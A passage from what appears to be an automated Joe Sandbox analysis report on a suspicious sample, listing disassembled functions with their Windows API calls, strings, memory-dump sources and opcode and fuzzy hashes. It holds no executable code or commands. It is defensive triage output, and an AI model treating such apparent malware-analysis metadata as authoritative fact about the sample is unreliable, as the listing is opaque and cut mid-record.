                  • Instruction Fuzzy Hash: C9C04C26906E44D41C913AB969422BE3F000E637E7BD222C2EF8057183DF1E060EB536
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F49F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F49DF1: GetDC.USER32(00000000), ref: 00F49DF5
                    • Part of subcall function 00F49DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F49E00
                    • Part of subcall function 00F49DF1: ReleaseDC.USER32(00000000,00000000), ref: 00F49E0B
                  • GetObjectW.GDI32(?,00000018,?), ref: 00F49F8D
                    • Part of subcall function 00F4A1E5: GetDC.USER32(00000000), ref: 00F4A1EE
                    • Part of subcall function 00F4A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00F4A21D
                    • Part of subcall function 00F4A1E5: ReleaseDC.USER32(00000000,?), ref: 00F4A2B5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ObjectRelease$CapsDevice
                  • String ID: (
                  • API String ID: 1061551593-3887548279
                  • Opcode ID: 7548ce3c90fc6825c8c7608e8d6e1ec6019dfd15a618d7109dcfbd6323dee774
                  • Instruction ID: 3402b86bf8b9e4b219871c59f2897219127363df9e703cba9d0960952c178448
                  • Opcode Fuzzy Hash: 7548ce3c90fc6825c8c7608e8d6e1ec6019dfd15a618d7109dcfbd6323dee774
                  • Instruction Fuzzy Hash: FF812271608218AFC714DF28CC54A2ABBE9FFC9714F00491DF99AD7260DB71AD05EB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F40E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _swprintf
                  • String ID: %ls$%s: %s
                  • API String ID: 589789837-2259941744
                  • Opcode ID: 95601202485daf385d0e44212dbbad93cbc15270b0fda0e20406b4f12112d267
                  • Instruction ID: 4a02e9169a70d8e13e8132d506228e3b9be8208e72583f9f3f2f06d96652fe0b
                  • Opcode Fuzzy Hash: 95601202485daf385d0e44212dbbad93cbc15270b0fda0e20406b4f12112d267
                  • Instruction Fuzzy Hash: 5C51B73368C700FEEA311AA8DD42F367E55FB04B10F204916FF9A648E5CEB655A47A13
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5A918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00F5AA84
                    • Part of subcall function 00F58849: IsProcessorFeaturePresent.KERNEL32(00000017,00F58838,00000050,00F63958,?,00F3CFE0,00000004,00F70EE8,?,?,00F58845,00000000,00000000,00000000,00000000,00000000), ref: 00F5884B
                    • Part of subcall function 00F58849: GetCurrentProcess.KERNEL32(C0000417,00F63958,00000050,00F70EE8), ref: 00F5886D
                    • Part of subcall function 00F58849: TerminateProcess.KERNEL32(00000000), ref: 00F58874
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                  • String ID: *?$.
                  • API String ID: 2667617558-3972193922
                  • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                  • Instruction ID: 0d5ff2e2f10ff02e9643689fd21ec8dd36fc9523ec3063a7f30372f6d9bb4b52
                  • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                  • Instruction Fuzzy Hash: CF51B271E0011AEFDF14CFA8CC41AADB7B5EF48311F25826AEA54E7300E6359E19DB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F37730
                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F378CC
                    • Part of subcall function 00F3A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F3A27A,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A458
                    • Part of subcall function 00F3A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F3A27A,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A489
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: File$Attributes$H_prologTime
                  • String ID: :
                  • API String ID: 1861295151-336475711
                  • Opcode ID: d306da4edfddb3543713882c56a59766994eb2085d4bf306a1609d04c80c8f76
                  • Instruction ID: b9da12a2dd4aea416f60cd8c16d1e879cfca64550d329d4914b84fc23d5261fe
                  • Opcode Fuzzy Hash: d306da4edfddb3543713882c56a59766994eb2085d4bf306a1609d04c80c8f76
                  • Instruction Fuzzy Hash: BD4175B1805258AADB34EB50DD55EEEB37CAF45320F0040DAB509A3092DBB85F88EF61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID: UNC$\\?\
                  • API String ID: 0-253988292
                  • Opcode ID: ff41f5a7baf475725c9b3d8bef3dc5a8e6d422cf79e7d7eb8d1fd03d00e628d5
                  • Instruction ID: ac191a8dd65f9ed114e484091b9d95d35394c52fc68204b9ef27cf7d0bdc11bf
                  • Opcode Fuzzy Hash: ff41f5a7baf475725c9b3d8bef3dc5a8e6d422cf79e7d7eb8d1fd03d00e628d5
                  • Instruction Fuzzy Hash: 1141B435C00219BACF20AF21DC51EEF77A9EF853B1F104065FA14A7252E778DA84FA60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F48FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID: Shell.Explorer$about:blank
                  • API String ID: 0-874089819
                  • Opcode ID: e7431aae9916eddefdd0a10698af21826abc12a0f9a19e73d51a8f60c307b499
                  • Instruction ID: 7017c9f8bdb6f6c5cbfd438a445dfa7125ea1379a835632e20e401e20b388acf
                  • Opcode Fuzzy Hash: e7431aae9916eddefdd0a10698af21826abc12a0f9a19e73d51a8f60c307b499
                  • Instruction Fuzzy Hash: 452161717182149FDB04DF68CC95A2B7BA8FF44721B14855DFC0A8B282DEB4EC01EB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F3EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F3EB92
                    • Part of subcall function 00F3EB73: GetProcAddress.KERNEL32(00F781C0,CryptUnprotectMemory), ref: 00F3EBA2
                  • GetCurrentProcessId.KERNEL32(?,?,?,00F3EBEC), ref: 00F3EC84
                  Strings
                  • CryptProtectMemory failed, xrefs: 00F3EC3B
                  • CryptUnprotectMemory failed, xrefs: 00F3EC7C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AddressProc$CurrentProcess
                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                  • API String ID: 2190909847-396321323
                  • Opcode ID: 37922556002e54e9a3059fa41470501514eabf408e00241f7026cabc3e5abfed
                  • Instruction ID: 5998539202de4bf2f3482d206316a6a80ab1c522e8d99b7e1710f76ad8505b74
                  • Opcode Fuzzy Hash: 37922556002e54e9a3059fa41470501514eabf408e00241f7026cabc3e5abfed
                  • Instruction Fuzzy Hash: DB112932E04228ABDB155B34DC06AAE3B54EF017B4F049015FC09AB2D1CB75AE41F7D5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F40889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNEL32(00000000,00010000,00F409D0,?,00000000,00000000), ref: 00F408AD
                  • SetThreadPriority.KERNEL32(?,00000000), ref: 00F408F4
                    • Part of subcall function 00F36E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F36EAF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Thread$CreatePriority__vswprintf_c_l
                  • String ID: CreateThread failed
                  • API String ID: 2655393344-3849766595
                  • Opcode ID: 2d648fa693baea618cff43d8f75c930f28517e2f294491edafd636a30ca05858
                  • Instruction ID: 1288d541c0af92176ea9512817d874a215d02f0e91408fd83ae9674f73e1cd5f
                  • Opcode Fuzzy Hash: 2d648fa693baea618cff43d8f75c930f28517e2f294491edafd636a30ca05858
                  • Instruction Fuzzy Hash: CC01F9B5344305BFD6206F54ED81FA677A8EF40725F20003EFA8AD2181DEF1A845B665
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F3DA98: _swprintf.LIBCMT ref: 00F3DABE
                    • Part of subcall function 00F3DA98: _strlen.LIBCMT ref: 00F3DADF
                    • Part of subcall function 00F3DA98: SetDlgItemTextW.USER32(?,00F6E154,?), ref: 00F3DB3F
                    • Part of subcall function 00F3DA98: GetWindowRect.USER32(?,?), ref: 00F3DB79
                    • Part of subcall function 00F3DA98: GetClientRect.USER32(?,?), ref: 00F3DB85
                  • GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                  • SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                  • String ID: 0
                  • API String ID: 2622349952-4108050209
                  • Opcode ID: 705913ced4283eb3ccc2ff87e799d01bb0d1e04bade4eae17724a588d60ae091
                  • Instruction ID: e529df2b62668a1c0033c0dcdd81eb4b9efe9840066e293937cf5835676412d1
                  • Opcode Fuzzy Hash: 705913ced4283eb3ccc2ff87e799d01bb0d1e04bade4eae17724a588d60ae091
                  • Instruction Fuzzy Hash: BFF0AF3090428CA6DF250F608C09BED3B98BF10335F089015FD4A555A2CB7AC999FB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF,00F40A78,?), ref: 00F40854
                  • GetLastError.KERNEL32(?), ref: 00F40860
                    • Part of subcall function 00F36E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F36EAF
                  Strings
                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00F40869
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                  • API String ID: 1091760877-2248577382
                  • Opcode ID: 3f91d34e429736a2fa00db26821a30e6f8cdc0c582201033cc05beca4a89d1d0
                  • Instruction ID: 00f9d91053677ff485f4b0be839282aefb2451b44151277d04aea5fe4217903f
                  • Opcode Fuzzy Hash: 3f91d34e429736a2fa00db26821a30e6f8cdc0c582201033cc05beca4a89d1d0
                  • Instruction Fuzzy Hash: B2D05E3690803076CA103B24AC0ADAF7D059F52734F208715F639A51F5DF650995B2DA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,00F3D32F,?), ref: 00F3DA53
                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00F3D32F,?), ref: 00F3DA61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: FindHandleModuleResource
                  • String ID: RTL
                  • API String ID: 3537982541-834975271
                  • Opcode ID: be27784401e01d91cdf1ab4ec9e50c68bf5009e2e79609372846d531980718b2
                  • Instruction ID: ae8c1ec0c416bb941e2111081dab7614e36503db1c1a37b4a0e4324abbd2c07f
                  • Opcode Fuzzy Hash: be27784401e01d91cdf1ab4ec9e50c68bf5009e2e79609372846d531980718b2
                  • Instruction Fuzzy Hash: 5FC0123268A350B6EF3027207D0DB833A486B10F26F09044CF241DA1D0DAF9CA48AAA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  Function 00007FF848F1121D Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: 13bac6709fe2b388e5e24a151d279ed21e898ce3520ef9369453b56ce431af3a
                  • Instruction ID: 2a69977af927c13949161a3e1a2e0d3a361d5ffd073af5cf795bd070b166850e
                  • Opcode Fuzzy Hash: 13bac6709fe2b388e5e24a151d279ed21e898ce3520ef9369453b56ce431af3a
                  • Instruction Fuzzy Hash: 5111B230D0D69E8EEB89FB6884A92F97BE0FF59341F4415BED40AC60D2EF255884C710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F11230 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: 7233f0853efeb7320dad3e3ed32dad65341b963f3ee95d0dcc778234e6332a6d
                  • Instruction ID: 30424b7885b020767f30bd7b15b90d2580cd1d506729ff0ea434b8f62617805a
                  • Opcode Fuzzy Hash: 7233f0853efeb7320dad3e3ed32dad65341b963f3ee95d0dcc778234e6332a6d
                  • Instruction Fuzzy Hash: 87F0FF30E1D69F8EEFC8ABA888682FA77E4FF56300F00103AE41DC20C2EF3458848650
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F105ED Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID: >O_^
                  • API String ID: 0-4219905819
                  • Opcode ID: 01cd5acab5b02b68bc087e5bc97833e3164e2ee130e9e990e25256719cdfb487
                  • Instruction ID: cf35980f0fe75cfe66fd5486b4e7a2dd212f786cb3e2bc961e48328c0c31765b
                  • Opcode Fuzzy Hash: 01cd5acab5b02b68bc087e5bc97833e3164e2ee130e9e990e25256719cdfb487
                  • Instruction Fuzzy Hash: 10F0F63094D64A9FEB55EBA088552FB7790FF09306F04093AE82EC15C1EB386A14C781
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1AD65 Relevance: .4, Instructions: 361COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 07a39b321504490cdc2cd26eb9df6dcdda2d4bff2d3c46de7890b98eb2ff28e9
                  • Instruction ID: 9a61a34b0f9c3b40365082e2011997154aa28a5226ee31d9bc59859a740aa280
                  • Opcode Fuzzy Hash: 07a39b321504490cdc2cd26eb9df6dcdda2d4bff2d3c46de7890b98eb2ff28e9
                  • Instruction Fuzzy Hash: E8D12631D1961ACFEBA8EB68D4947BDB7B1FF99341F5000B9D40EA3292CB396841CB45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F116B8 Relevance: .3, Instructions: 287COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d3d525cee2eca1011c94315644010eb2ff3719e70fa834c8d78533ddaf7f67ed
                  • Instruction ID: df8558e3e4f6d65488a6742024c0d8e2676fe66b99b5ff84d444d4ac52b2c837
                  • Opcode Fuzzy Hash: d3d525cee2eca1011c94315644010eb2ff3719e70fa834c8d78533ddaf7f67ed
                  • Instruction Fuzzy Hash: B581AC31A1CA9A8FDB58EF1888516A977E2FF99744F14057EE44DC32C2CE34AC42C785
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F11C9D Relevance: .2, Instructions: 193COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aa62f4bdc8247f01d80521694b7fb633cd66b791e7eafa03fe0a54f799806a39
                  • Instruction ID: b14098f6bcbe0a335a2ced0fd894f3a090983a7bd3874de8cc7d8bbe0752a841
                  • Opcode Fuzzy Hash: aa62f4bdc8247f01d80521694b7fb633cd66b791e7eafa03fe0a54f799806a39
                  • Instruction Fuzzy Hash: 7951AB31A1CA9A8FDB49EF1888655AA77E2FB98344F14457ED44AC32C2DF34AC42C785
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F25430 Relevance: .2, Instructions: 172COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: df65b39571ffb31eff9a53b902ca33793deca91a603ddf9ded7421dbcb55a12a
                  • Instruction ID: 4e97c6dbd6c340924ed19d894806fac7674c65567473fa94c205f9a9e19220cf
                  • Opcode Fuzzy Hash: df65b39571ffb31eff9a53b902ca33793deca91a603ddf9ded7421dbcb55a12a
                  • Instruction Fuzzy Hash: D3510730D1891D8FEF98EBA8E859ABDB7F1FB58355F40017AD00DE3295DB35A8818B44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F130F5 Relevance: .2, Instructions: 165COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2123157611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_brokercrt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aeeab1d6cf2c7074bf6f083926c457a9d008c0507dc10e87b72f2826a66012d7
                  • Instruction ID: 02e949aaabddbfb2094ec18fcd50db4cd42625feb6ab56a2b475b0d376dfbb33
